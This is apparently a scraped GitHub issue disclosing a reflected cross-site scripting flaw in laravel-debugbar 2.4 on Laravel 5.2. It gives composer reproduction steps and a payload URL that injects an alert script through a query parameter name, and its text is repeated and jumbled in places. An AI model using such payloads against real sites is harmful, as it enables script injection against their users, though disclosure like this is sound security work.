and visit: http://{domain}/{laravel_path}/_debugbar/open?op=get&id=om3rcitak&<scRipt>alert(21)<%2fscRipt>=om3rcitak
Notes: I am testing laravel-debugger latest version (2.4) for Laravel 5.2.*. This vulnerability not effected Laravel >= 5.3 or laravel-debugger >=3.0 because Laravel using different error page template for version 5.2 and 5.3.
The text was updated successfully, but these errors were encountered:
@barryvdh yes, but problem not from debugbar. Laravel composer json file must be change. But Laravel team don't think change the composer json file :) details: laravel/framework#24892
This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs.
If this issue is still present on the latest version of this library on supported Laravel versions, please let us know by replying to this issue so we can investigate further.
Thank you for your contribution! Apologies for any delayed response on our side.
Security Vulnerability - Cross-site Scripting
Environment
Injection Technical Details
URL: http://{domain}/{laravel_path}/_debugbar/open?op=get&id=om3rcitak&<scRipt>alert(21)<%2fscRipt>=om3rcitak
Parameter Type: Parameter Name
Attack Pattern: <scRipt>alert(21)<%2fscRipt>
Repro
$
composer create-project --prefer-dist laravel/laravel:5.2.*$
cd laravel$
composer require barryvdh/laravel-debugbar:~2.4$
php artisan vendor:publish --provider="Barryvdh\Debugbar\ServiceProvider"$
php artisan serveand visit: http://{domain}/{laravel_path}/_debugbar/open?op=get&id=om3rcitak&<scRipt>alert(21)<%2fscRipt>=om3rcitak
Notes: I am testing laravel-debugger latest version (2.4) for Laravel 5.2.*. This vulnerability not effected Laravel >= 5.3 or laravel-debugger >=3.0 because Laravel using different error page template for version 5.2 and 5.3.
The text was updated successfully, but these errors were encountered: